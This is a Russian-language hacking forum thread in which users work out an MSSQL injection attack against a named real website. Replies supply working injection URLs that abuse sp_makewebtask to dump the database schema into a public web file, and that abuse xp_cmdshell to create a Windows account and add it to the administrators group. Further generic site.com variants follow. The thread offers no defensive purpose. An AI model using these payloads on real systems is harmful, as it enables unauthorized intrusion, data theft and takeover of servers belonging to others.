|
mssql inj вопрос для гуру
Здравствуйте помогите понять почему неработают некоторые фишки mssql
для примера взял инъекцию на сайте пидоров :) Цитата:
Цитата:
хочу добавить юзера через xp_cmdshell Цитата:
Цитата:
что я делаю неправильно в этом случае? xp_cmdshell вроде неотключён и должно всё сработать а недобавляет юзера :( коннекчусь к серваку через удалённый рабочий стол и говорит логин пасс неверный пробую зделать дамп таблиц через sp_makewebtask Цитата:
Incorrect syntax near the keyword 'order'. тут что я нетак делаю? путьдо веб директории в ошибке взял Error Executing Database Query. [Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'order'. The error occurred in C:\Inetpub\wwwroot\www.cybersocket.com\includes\qr y_get_article_id.cfm: line 17 Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\cur rent.cfm: line 1 Called from C:\Inetpub\wwwroot\www.cybersocket.com\includes\qr y_get_article_id.cfm: line 17 Called from C:\Inetpub\wwwroot\www.cybersocket.com\current\cur rent.cfm: line 1 P.S. как узнавать таблицы и колонки+инфу в них я знаю и как сливать построчно тоже,меня интересуют способы именно через xp_cmdshell , sp_makewebtask и другие примочки mssql когда есть права sa |
Цитата:
Код:
http://cybersocket.com/current/current.cfm?issue_id=1;+EXEC+master..sp_makewebtask+%22C:\Inetpub\wwwroot\www.cybersocket.com\includes\output.html%22,%22SELECT+*+FROM+INFORMATION_SCHEMA.TABLES%22;+select+c.id,c.category+from+tbl_issue_category+ic,tbl_category+c,tbl_article+a+where+ic.category=a.category+and+ic.issue=a.issue+and+ic.category=c.id+and+ic.issue=1http://cybersocket.com/includes/output.html а здесь можешь посмотреть все колонки http://cybersocket.com/includes/output5.html ЗЫ Юзверя создавать не буду, надеюсь сам дальше разберешься, а то совсем непохек получится =\ ЗЗЫ Ток там при добалении юзверя не забудь вместо ' поставить "(%22) |
спасибо большое,как бы с тобой пообщаться в icq ? время много неотнему и глупыми вопросами доставать небуду...напиши в пм свою асю плз
|
с юзером пробовал и так как ты написал(до создания тут темы ещё),неработает почему-то...может у меня руки неоттуда ростут) ну нетолько с этой багой такие проблемы
|
Цитата:
Код:
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell%20%22net%20user%20test1%20hacker%20/add%22;select%20c.id,%20c.category%20from%20tbl_issue_category%20ic,%20tbl_category%20c,%20tbl_article%20aКод:
http://cybersocket.com/current/current.cfm?issue_id=1;exec%20master..xp_cmdshell%20%22net%20localgroup%20administrators%20test1%20/add%22;select%20c.id,%20c.category%20from%20tbl_issue_category%20ic,%20tbl_category%20c,%20tbl_article%20a |
да всё ок!
чёто я тупанул немного,спасибо |
нашёл ещё одну inj с правами sa там там возникает такая ошибка при подстановке -1'
Цитата:
Цитата:
Цитата:
как я понял тут в одной переменной скрипта id передаются два запроса к базе и нужно правильно вставить свой запрос и второй запрос закрыть (может конечно я глупость сказал ) так ещё пробовал site.com/bug.asp?ID=1';exec%20master..xp_cmdshell%20%20net% 20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test %20/add%22;1';-- Цитата:
Цитата:
|
здесь: site.com/index.asp?id=1;exec.... после 1 попробуй поставь поставь ковычку
вот так попробуй: Код:
site.com/index.asp?id=1';exec%20master..xp_cmdshell%20' net%20user%20test%20pass%20/add%20&%20net%20localgroup%20administrators%20test%20/add |
Вообще тему имхо пора закрывать, для скулей есть отдельная тема, туда и выкладывай, там тебе быстро помогут. А вообще больше становится похожим на просьбы о взломе =\
|
где отдельная тема по скулям дай линк
я не прошу чтоб мне кто-то что-то взламывал, я хочу сам понять почему у меня неполучается составить правильный запрос к базе прежде чем что-то спрашивать я сам пробую по всякому и инфу везде где только можно ищу по теме и потом только спрашиваю у вас |
| Время: 19:43 |